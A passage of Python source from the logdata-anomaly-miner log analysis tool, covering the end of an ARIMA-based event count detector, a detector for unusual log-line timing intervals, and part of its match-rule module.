self.period_length_list[event_index][count_index]:], order=(self.period_length_list[event_index][count_index], 0, 0), seasonal_order=(0, 0, 0, self.period_length_list[event_index][count_index])) self.arima_models[event_index][count_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index][count_index] = None if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Make a one-step prediction with the new values elif self.arima_models[event_index][count_index] is not None: count = self.event_type_detector.values[event_index][var_index][-1] # Add the prediction to the lists lower_limit, upper_limit = self.one_step_prediction(event_index, count_index) self.prediction_history[event_index][count_index][0].append(lower_limit) self.prediction_history[event_index][count_index][1].append(count) self.prediction_history[event_index][count_index][2].append(upper_limit) # Shorten the lists if necessary if len(self.prediction_history[event_index][count_index][0]) > self.num_max_time_history: self.prediction_history[event_index][count_index][0] = self.prediction_history[event_index][count_index][0][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][1] = self.prediction_history[event_index][count_index][1][ -self.num_min_time_history:] self.prediction_history[event_index][count_index][2] = self.prediction_history[event_index][count_index][2][ -self.num_min_time_history:] else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Path: ' \ f'{self.event_type_detector.variable_key_list[event_index][var_index]}, Lower: {lower_limit}, Count: ' \ f'{count}, Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index][var_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index][count_index].append(0) else: self.result_list[event_index][count_index].append(1) # Reduce the number of entries in the time history if it gets too large if len(self.result_list[event_index][count_index]) >= 2 * max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]): self.result_list[event_index][count_index] = self.result_list[event_index][count_index][-max( self.num_results_bt, self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]):] # Check if the too few or many successes are in the last section of the test history and discard the model # Else update the model for the next step if self.learn_mode and ( sum(self.result_list[event_index][count_index][-self.num_results_bt:]) + max(0, self.num_results_bt - len(self.result_list[event_index][count_index])) < self.bt_min_suc or binom_test(x=sum(self.result_list[event_index][count_index][ -self.num_periods_tsa_ini * self.period_length_list[event_index][count_index]:]), n=self.num_periods_tsa_ini * self.period_length_list[event_index][count_index], p=(1-self.alpha), alternative='greater') < self.alpha_bt): message = f'Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)} and path ' \ f'{self.event_type_detector.variable_key_list[event_index][var_index]}' affected_path = self.event_type_detector.variable_key_list[event_index][var_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index][count_index] = None self.result_list[event_index][count_index] = [] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time else: # Update the model self.arima_models[event_index][count_index] = self.arima_models[event_index][count_index].append([count]) def one_step_prediction(self, event_index, count_index): """Make a one step prediction with the Arima model""" prediction = self.arima_models[event_index][count_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return to the order: lower_limit, upper_limit return prediction[0][0], prediction[0][1] def bt_min_successes(self, num_bt, p, alpha): # skipcq: PYL-R0201 """ Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = np.math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = '' if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': affected_path} event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {}} if self.event_type_detector.id_path_list: event_data['IDpaths'] = self.event_type_detector.id_path_list event_data['IDvalues'] = list(self.event_type_detector.id_path_list_tuples[self.event_type_detector.current_index]) if confidence is not None: event_data['TypeInfo']['Confidence'] = confidence for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) PathValueTimeIntervalDetector.py000066400000000000000000000576561437606560100372570ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for time intervals of the appearance of log lines. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import os import logging import time from aminer import AminerConfig from aminer.AminerConfig import DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, CONFIG_KEY_LOG_LINE_PREFIX,\ DEFAULT_LOG_LINE_PREFIX from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.util import PersistenceUtil class PathValueTimeIntervalDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class analyzes the time intervals of the appearance of log_atoms. The considered time intervals depend on the combination of values in the target_paths of target_path_list. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, persistence_id='Default', target_path_list=None, allow_missing_values_flag=True, ignore_list=None, output_logline=True, learn_mode=False, time_period_length=86400, max_time_diff=360, num_reduce_time_list=10, stop_learning_time=None, stop_learning_no_anomaly_time=None): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param target_path_list parser paths of values to be analyzed. Multiple paths mean that values are analyzed by their combined occurrences. When no paths are specified, the events given by the full path list are analyzed. @param allow_missing_values_flag when set to True, the detector will also use matches, where one of the pathes from paths does not refer to an existing parsed data object. @param ignore_list list of paths that are not considered for correlation, i.e., events that contain one of these paths are omitted. The default value is [] as None is not iterable. @param output_logline specifies whether the full parsed log atom should be provided in the output. @param learn_mode specifies whether new frequency measurements override ground truth frequencies. @param time_period_length length of the time window for which the appearances of log lines are identified with each other. Value of 86400 specifies a day and 604800 a week. @param max_time_diff maximal time difference in seconds for new times. If the difference of the new time to all previous times is greater than max_time_diff the new time is considered an anomaly. @param num_reduce_time_list number of new time entries appended to the time list, before the list is being reduced. @param stop_learning_time switch the learn_mode to False after the time. @param stop_learning_no_anomaly_time switch the learn_mode to False after no anomaly was detected for that time. """ # avoid "defined outside init" issue self.learn_mode, self.stop_learning_timestamp, self.next_persist_time, self.log_success, self.log_total = [None]*5 super().__init__( mutable_default_args=["target_path_list", "ignore_list"], aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, target_path_list=target_path_list, allow_missing_values_flag=allow_missing_values_flag, ignore_list=ignore_list, output_logline=output_logline, learn_mode=learn_mode, time_period_length=time_period_length, max_time_diff=max_time_diff, num_reduce_time_list=num_reduce_time_list, stop_learning_time=stop_learning_time, stop_learning_no_anomaly_time=stop_learning_no_anomaly_time ) # Keys: Tuple of values of the paths of target_path_list, Entries: List of all appeared times to the tuple. self.appeared_time_list = {} # Keys: Tuple of values of the paths of target_path_list, Entries: Counter of appended times to the time list since last reduction. self.counter_reduce_time_intervals = {} # Loads the persistence self.persistence_id = persistence_id self.persistence_file_name = AminerConfig.build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) # Imports the persistence self.load_persistence_data() def receive_atom(self, log_atom): """ Analyze if the time of the log_atom appeared in the time interval of a previously appeared times. The considered time intervals originate of events with the same combination of values in the target_paths of target_path_list. @param log_atom the parsed log atom @return True if this handler was really able to handle and process the match. """ if log_atom.atom_time is None: return False if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False match_dict = log_atom.parser_match.get_match_dictionary() # Skip paths from ignore_list. for ignore_path in self.ignore_list: if ignore_path in match_dict.keys(): return False # Get current index from combination of values of paths of target_path_list id_tuple = () for id_path in self.target_path_list: id_match = log_atom.parser_match.get_match_dictionary().get(id_path) if id_match is None: if self.allow_missing_values_flag is True: # Insert placeholder for id_path that is not available id_tuple += ('',) else: # Omit log atom if one of the id paths is not found. return False else: if isinstance(id_match.match_object, bytes): id_tuple += (id_match.match_object.decode(AminerConfig.ENCODING),) else: id_tuple += (id_match.match_object,) # Print message if combination of values is new if id_tuple not in self.appeared_time_list: additional_information = {'AffectedLogAtomValues': [str(repr(val))[2:-1] for val in id_tuple], 'NewTime': log_atom.atom_time % self.time_period_length} msg = f'First time ({log_atom.atom_time % self.time_period_length}) detected for [' for match_value in id_tuple: msg += str(repr(match_value))[1:] + ', ' msg = msg[:-2] + ']' self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) self.appeared_time_list[id_tuple] = [log_atom.atom_time % self.time_period_length] self.counter_reduce_time_intervals[id_tuple] = 0 else: # Checks if the time has already been observed if log_atom.atom_time % self.time_period_length not in self.appeared_time_list[id_tuple]: # Check and print a message if the new time is out of range of the observed times # The second query is needed when time intervals exceed over 0/self.time_period_length if all((abs(log_atom.atom_time % self.time_period_length - time) > self.max_time_diff) and (abs(log_atom.atom_time % self.time_period_length - time) < self.time_period_length - self.max_time_diff) for time in self.appeared_time_list[id_tuple]): additional_information = {'AffectedLogAtomValues': [str(repr(val))[2:-1] for val in id_tuple], 'PreviousAppearedTimes': [float(val) for val in self.appeared_time_list[id_tuple]], 'NewTime': log_atom.atom_time % self.time_period_length} msg = f'New time ({log_atom.atom_time % self.time_period_length}) out of range of previously observed times ' \ f'{self.appeared_time_list[id_tuple]} detected for [' for match_value in id_tuple: msg += str(repr(match_value))[1:] + ', ' msg = msg[:-2] + ']' self.print(msg, log_atom=log_atom, affected_path=self.target_path_list, additional_information=additional_information) if not self.learn_mode: return True if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = time.time() + self.stop_learning_no_anomaly_time # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended self.insert_and_reduce_time_intervals(id_tuple, log_atom.atom_time % self.time_period_length) return True def insert_and_reduce_time_intervals(self, id_tuple, new_time): """Add the new time to the time list and reduce the time list after num_reduce_time_list of times have been appended.""" # Increase the counter of new times since last reduction self.counter_reduce_time_intervals[id_tuple] += 1 # Get the index in which the new time is inserted if new_time > self.appeared_time_list[id_tuple][-1]: time_index = len(self.appeared_time_list[id_tuple]) else: # skipcq: PTC-W0063 time_index = next(index for index, time in enumerate(self.appeared_time_list[id_tuple]) if time > new_time) # Insert the new time self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:time_index] + [new_time] +\ self.appeared_time_list[id_tuple][time_index:] # Reduce the time intervals, by removing the obsolete entries if self.counter_reduce_time_intervals[id_tuple] >= self.num_reduce_time_list: # Reset the counter self.counter_reduce_time_intervals[id_tuple] = 0 # Check every entry if it enlarges the time intervals, and remove it, if not. last_accepted_time = self.appeared_time_list[id_tuple][0] + self.time_period_length for index in range(len(self.appeared_time_list[id_tuple])-1, 0, -1): if last_accepted_time - self.appeared_time_list[id_tuple][index-1] < 2 * self.max_time_diff: del self.appeared_time_list[id_tuple][index] else: last_accepted_time = self.appeared_time_list[id_tuple][index] # Checks the last and first two time of the time list, and removes the obsolete entries if (len(self.appeared_time_list[id_tuple]) >= 4) and ( self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-2] < 2 * self.max_time_diff): self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][0] - self.appeared_time_list[id_tuple][-2] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:len(self.appeared_time_list[ id_tuple])-1] elif self.time_period_length + self.appeared_time_list[id_tuple][1] - self.appeared_time_list[id_tuple][-1] <\ 2 * self.max_time_diff: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][1:] def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" persist_data = [[], []] for id_tuple, time_list in self.appeared_time_list.items(): persist_data[0].append((id_tuple, time_list)) for id_tuple, counter in self.counter_reduce_time_intervals.items(): persist_data[1].append((id_tuple, counter)) PersistenceUtil.store_json(self.persistence_file_name, persist_data) logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def load_persistence_data(self): """Load the persistence data from storage.""" persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is not None: for id_tuple, time_list in persistence_data[0]: self.appeared_time_list[tuple(id_tuple)] = time_list for id_tuple, counter in persistence_data[1]: self.counter_reduce_time_intervals[tuple(id_tuple)] = counter logging.getLogger(AminerConfig.DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def print_persistence_event(self, event_type, event_data): """ Print the persistence of component_name. Event_data specifies what information is output. @return a message with information about the persistence. @throws Exception when the output for the event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Query if event_data has one of the stated formats if not (isinstance(event_data, list) and len(event_data) <= 1 and ((len(event_data) == 1 and ( isinstance(event_data[0], list) and len(event_data[0]) in [0, len(self.target_path_list)]) and all(isinstance(value, str) for value in event_data[0])) or len(event_data) == 0)): msg = 'Event_data has the wrong format. ' \ 'The supported formats are [] and [path_value_list], where the path value list is a list of strings with the same ' \ 'length as the defined paths in the config.' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) # Convert path value lists to tuples for i in range(len(event_data)): event_data[i] = tuple(event_data[i]) if len(event_data) == 0: # Print the set of all appeared path values if no event_data is given values_set = set(self.appeared_time_list.keys()) values_list = list(values_set) values_list.sort() string = f'Time intervals are tracked for the following path values: {values_list}' elif len(event_data) == 1: id_tuple = event_data[0] # Check if the path value is tracked if id_tuple not in self.appeared_time_list: return f'Persistence includes no information for {id_tuple}.' # Calculate the current time intervals time_intervals = [[max(0, t - self.max_time_diff), min(self.time_period_length, t + self.max_time_diff)] for t in self.appeared_time_list[id_tuple]] # Add time intervals, when the time intervals exceed the time period length or undercuts zero. if self.appeared_time_list[id_tuple][-1] + self.max_time_diff > self.time_period_length: time_intervals = [[0, self.appeared_time_list[id_tuple][-1] + self.max_time_diff - self.time_period_length]] +\ time_intervals if self.appeared_time_list[id_tuple][0] - self.max_time_diff < 0: time_intervals = time_intervals +\ [[self.appeared_time_list[id_tuple][0] - self.max_time_diff + self.time_period_length, self.time_period_length]] # Get the indices of the time windows whoch intercept and therefore are merged indices = [i for i in range(len(time_intervals) - 1) if time_intervals[i][1] > time_intervals[i + 1][0]] # Merge the time intervals for index in reversed(indices): time_intervals[index + 1][0] = time_intervals[index][0] time_intervals = time_intervals[:index] + time_intervals[index + 1:] # Set output string string = f'The list of appeared times is {self.appeared_time_list[id_tuple]} and the resulting time intervals are ' \ f'{time_intervals} for path value {id_tuple}' return string def add_to_persistence_event(self, event_type, event_data): """ Add or overwrite the information of event_data to the persistency of component_name. @return a message with information about the addition to the persistency. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\ len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\ not isinstance(event_data[1], (int, float)): msg = 'Event_data has the wrong format. ' \ 'The supported format is [path_value_list, new_appeared_time], ' \ 'where path_value_list is a list of strings with the same length as paths defined in the config.' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) id_tuple = tuple(event_data[0]) new_time = event_data[1] msg = '' if id_tuple not in self.appeared_time_list: # Print message if combination of values is new msg = f'First time ({new_time % self.time_period_length}) added for {id_tuple}' self.appeared_time_list[id_tuple] = [new_time % self.time_period_length] self.counter_reduce_time_intervals[id_tuple] = 0 else: # Print a message if the new time is added to the list of observed times msg = f'New time ({new_time % self.time_period_length}) added to the range of previously observed times ' \ f'{self.appeared_time_list[id_tuple]} for {id_tuple}' # Add the new time to the time list and reduces the time list after num_reduce_time_list of times have been appended self.insert_and_reduce_time_intervals(id_tuple, new_time % self.time_period_length) return msg def remove_from_persistence_event(self, event_type, event_data): """ Add or overwrite the information of event_data to the persistence of component_name. @return a message with information about the addition to the persistence. @throws Exception when the addition of this special event using given event_data was not possible. """ if event_type != f'Analysis.{self.__class__.__name__}': msg = 'Event not from this source' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not isinstance(event_data, list) or len(event_data) != 2 or not isinstance(event_data[0], list) or\ len(event_data[0]) != len(self.target_path_list) or not all(isinstance(value, str) for value in event_data[0]) or\ not isinstance(event_data[1], (int, float)): msg = 'Event_data has the wrong format. ' \ 'The supported format is [path_value_list, old_appeared_time], ' \ 'where path_value_list is a list of strings with the same length as paths defined in the config.' logging.getLogger(AminerConfig.DEBUG_LOG_NAME).error(msg) raise Exception(msg) id_tuple = tuple(event_data[0]) new_time = event_data[1] msg = '' if id_tuple not in self.appeared_time_list: # Print message if combination of values is new msg = f'{id_tuple} has previously not appeared' elif not any(abs(new_time - val) < 0.5 for val in self.appeared_time_list[id_tuple]): # Print a message if the new time does not appear the list of observed times msg = f'Time ({new_time % self.time_period_length}) does not appear in the previously observed times ' \ f'{self.appeared_time_list[id_tuple]} for {id_tuple}' else: # Remove the old time from the time list. for index in reversed(range(len(self.appeared_time_list[id_tuple]))): if abs(new_time - self.appeared_time_list[id_tuple][index]) < 0.5: self.appeared_time_list[id_tuple] = self.appeared_time_list[id_tuple][:index] +\ self.appeared_time_list[id_tuple][index + 1:] # Print a message if the new time is added to the list of observed times msg = f'Time ({new_time % self.time_period_length}) was removed from the range of previously observed times ' \ f'{self.appeared_time_list[id_tuple]} for {id_tuple}' return msg def print(self, message, log_atom, affected_path, additional_information=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] if additional_information is None: additional_information = {} original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode(AminerConfig.ENCODING)] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + log_atom.raw_data.decode(AminerConfig.ENCODING)] analysis_component = {'AffectedLogAtomPaths': affected_path} for key, value in additional_information.items(): analysis_component[key] = value event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis/Rules.py000066400000000000000000000606251437606560100325070ustar00rootroot00000000000000""" This package contains various classes to build check rulesets. The ruleset also supports parallel rule evaluation, e.g. the two rules "A and B and C" and "A and B and D" will only peform the checks for A and B once, then performs check C and D and trigger a match action. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import datetime import sys import abc import logging from aminer.util.History import LogarithmicBackoffHistory from aminer.util.History import ObjectHistory from aminer.analysis.AtomFilters import SubhandlerFilter from aminer.AminerConfig import DEBUG_LOG_NAME, STAT_LOG_NAME from aminer import AminerConfig result_string = '%s(%s)' class MatchAction(metaclass=abc.ABCMeta): """This is the interface of all match actions.""" @abc.abstractmethod def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ class EventGenerationMatchAction(MatchAction): """This generic match action forwards information about a rule match on parsed data to a list of event handlers.""" def __init__(self, event_type, event_message, event_handlers): self.event_type = event_type self.event_message = event_message self.event_handlers = event_handlers def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ event_data = {} for handler in self.event_handlers: handler.receive_event(self.event_type, self.event_message, [log_atom.parser_match.match_element.annotate_match('')], event_data, log_atom, self) class AtomFilterMatchAction(MatchAction, SubhandlerFilter): """This generic match rule forwards all rule matches to a list of AtomHandlerInterface instances using the SubhandlerFilter.""" def __init__(self, subhandler_list, stop_when_handled_flag=False): SubhandlerFilter.__init__(self, subhandler_list, stop_when_handled_flag) def match_action(self, log_atom): """ Invoke this method if a rule has matched. @param log_atom the LogAtom matching the rules. """ self.receive_atom(log_atom) class MatchRule(metaclass=abc.ABCMeta): """This is the interface of all match rules.""" log_success = 0 log_total = 0 @abc.abstractmethod def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" def log_statistics(self, rule_id): """Log statistics of an MatchRule. Override this method for more sophisticated statistics output of the MatchRule.""" if AminerConfig.STAT_LEVEL > 0: logging.getLogger(STAT_LOG_NAME).info("Rule '%s' processed %d out of %d log atoms successfully in the last 60 minutes.", rule_id, self.log_success, self.log_total) self.log_success = 0 self.log_total = 0 if hasattr(self, 'sub_rules'): for i, rule in enumerate(self.sub_rules): rule.log_statistics(rule_id + '.' + rule.__class__.__name__ + str(i)) if hasattr(self, 'rule_lookup_dict'): for i, rule_key in enumerate(self.rule_lookup_dict): rule = self.rule_lookup_dict[rule_key] rule.log_statistics(rule_id + '.' + rule.__class__.__name__ + str(i)) if hasattr(self, 'default_rule'): self.default_rule.log_statistics(rule_id + '.default_rule.' + self.default_rule.__class__.__name__) if hasattr(self, 'sub_rule'): self.sub_rule.log_statistics(rule_id + '.' + self.sub_rule.__class__.__name__) class AndMatchRule(MatchRule): """This class provides a rule to match all subRules (logical and).""" def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if this rule matches. Rule evaluation will stop when the first match fails. If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when all subrules matched. """ self.log_total += 1 for rule in self.sub_rules: if not rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' and ' return result class OrMatchRule(MatchRule): """This class provides a rule to match any subRules (logical or).""" def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if this rule matches. Rule evaluation will stop when the first match succeeds. If a matchAction is attached to this rule, it will be invoked after the first match. @return True when any subrule matched. """ self.log_total += 1 for rule in self.sub_rules: if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' or ' return result class ParallelMatchRule(MatchRule): """ This class is a rule testing all the subrules in parallel. From the behaviour it is similar to the OrMatchRule, returning true if any subrule matches. The difference is that matching will not stop after the first positive match. This does only make sense when all subrules have match actions associated. """ def __init__(self, sub_rules, match_action=None): """ Create the rule. @param match_action if None, no action is performed. """ self.sub_rules = sub_rules self.match_action = match_action def match(self, log_atom): """ Check if any of the subrules rule matches. The matching procedure will not stop after the first positive match. If a matchAction is attached to this rule, it will be invoked at the end of all checks. @return True when any subrule matched. """ self.log_total += 1 match_flag = False for rule in self.sub_rules: if rule.match(log_atom): match_flag = True if match_flag and (self.match_action is not None): self.match_action.match_action(log_atom) if match_flag: self.log_success += 1 return match_flag def __str__(self): result = '' preamble = '' for match_element in self.sub_rules: result += result_string % (preamble, match_element) preamble = ' por ' return result class ValueDependentDelegatedMatchRule(MatchRule): """ This class is a rule delegating rule checking to subrules depending on values found within the parser_match. The result of this rule is the result of the selected delegation rule. """ def __init__(self, target_path_list, rule_lookup_dict, default_rule=None, match_action=None): """ Create the rule. @param list with value paths that are used to extract the lookup keys for ruleLookupDict. If value lookup fails, None will be used for lookup. @param rule_lookup_dict dictionary with tuple containing values for valuePathList as key and target rule as value. @param default_rule when not none, this rule will be executed as default. Otherwise, when rule lookup failed, False will be returned unconditionally. @param match_action if None, no action is performed. """ self.target_path_list = target_path_list self.rule_lookup_dict = rule_lookup_dict self.default_rule = default_rule self.match_action = match_action def match(self, log_atom): """ Try to locate a rule for delegation or use the default rule. @return True when selected delegation rule matched. """ self.log_total += 1 match_dict = log_atom.parser_match.get_match_dictionary() value_list = [] for path in self.target_path_list: value_element = match_dict.get(path) if value_element is not None: value_list.append(value_element.match_object) if len(value_list) > 0: value = tuple(value_list) else: value = None rule = self.rule_lookup_dict.get(value, self.default_rule) if rule is None: return False if rule.match(log_atom): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): result = 'ValueDependentDelegatedMatchRule' return result class NegationMatchRule(MatchRule): """Match elements of this class return true when the subrule did not match.""" def __init__(self, sub_rule, match_action=None): self.sub_rule = sub_rule self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 if self.sub_rule.match(log_atom): return False if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True def __str__(self): return f'not {self.sub_rule}' class PathExistsMatchRule(MatchRule): """Match elements of this class return true when the given target_path was found in the parsed match data.""" def __init__(self, target_path, match_action=None): self.target_path = target_path self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 if self.target_path in log_atom.parser_match.get_match_dictionary(): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f'hasPath({self.target_path})' class ValueMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and has exactly the given parsed value.""" def __init__(self, target_path, value, match_action=None): self.target_path = target_path self.value = value self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path, None) if test_value is not None: if isinstance(self.value, bytes) and isinstance(test_value.match_object, str) and test_value.match_object is not None: test_value.match_object = test_value.match_object.encode() elif isinstance(self.value, str) and isinstance(test_value.match_object, bytes) and self.value is not None: self.value = self.value.encode() elif not isinstance(self.value, type(test_value.match_object)): raise TypeError(f"The type of the value of the ValueMatchRule does not match the test_value. value: {type(self.value)}, " f"test_value: {type(test_value.match_object)}") if (test_value is not None) and (test_value.match_object == self.value): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): if isinstance(self.value, bytes): self.value = self.value.decode() return f'value({self.target_path})=={self.value}' class ValueListMatchRule(MatchRule): """Match elements of this class return true when the given path exists and has exactly one of the values included in the value list.""" def __init__(self, target_path, target_value_list, match_action=None): self.target_path = target_path self.target_value_list = target_value_list self.match_action = match_action def match(self, log_atom): """Check if this rule matches. On match an optional match_action could be triggered.""" self.log_total += 1 test_value = log_atom.parser_match.get_match_dictionary().get(self.target_path) if (test_value is not None) and (test_value.match_object in self.target_value_list): if self.match_action is not None: self.match_action.match_action(log_atom) self.log_success += 1 return True return False def __str__(self): return f"value({' '.join([str(value) for value in self.target_value_list])}) in {self.target_path}" class ValueRangeMatchRule(MatchRule): """Match elements of this class return true when the given target_path exists and the value is included in [lower, upper] range.""" def __init__(self, target_path, lower_limit, upper_limit, match_action=None): self.target_path = target_path self.lower_limit = lower_limit self.upper_limit = upper_limit 